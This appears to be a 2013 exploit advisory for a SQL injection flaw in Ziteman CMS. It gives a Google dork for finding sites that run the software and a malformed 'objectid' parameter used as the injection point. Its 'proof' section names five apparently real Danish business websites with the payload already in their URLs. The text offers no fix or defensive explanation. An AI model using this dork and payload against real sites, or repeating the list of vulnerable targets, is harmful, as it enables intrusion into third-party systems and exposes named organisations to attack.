Ziteman CMS suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
19562771660d7b9b0a18440eb863ac42c82aa8200a8419aa7fee6b324ea83479
#********************************************************************************
# Exploit Title : Ziteman CMS SQL Injection Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Software Link : http://www.ziteman.dk
#
# Tested on: Windows 7 , Linux
#
# Google Dork : intext:" Powered by Ziteman CMS"
#
# Date: 2013/09/11
#
--------------------------------------------------------------------
# Exploit : Sql Injection
#
# Location : [Target]/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
#
# Proof:
#
# http://www.ark-jr.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
# http://www.apservice.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
# http://www.cjservice.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
# http://www.slibecentral.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
# http://www.vhm.dk/page.asp?objectid=1A%00xa7A%3f&zcs=62
#
######################
discovered by : ACC3SS
######################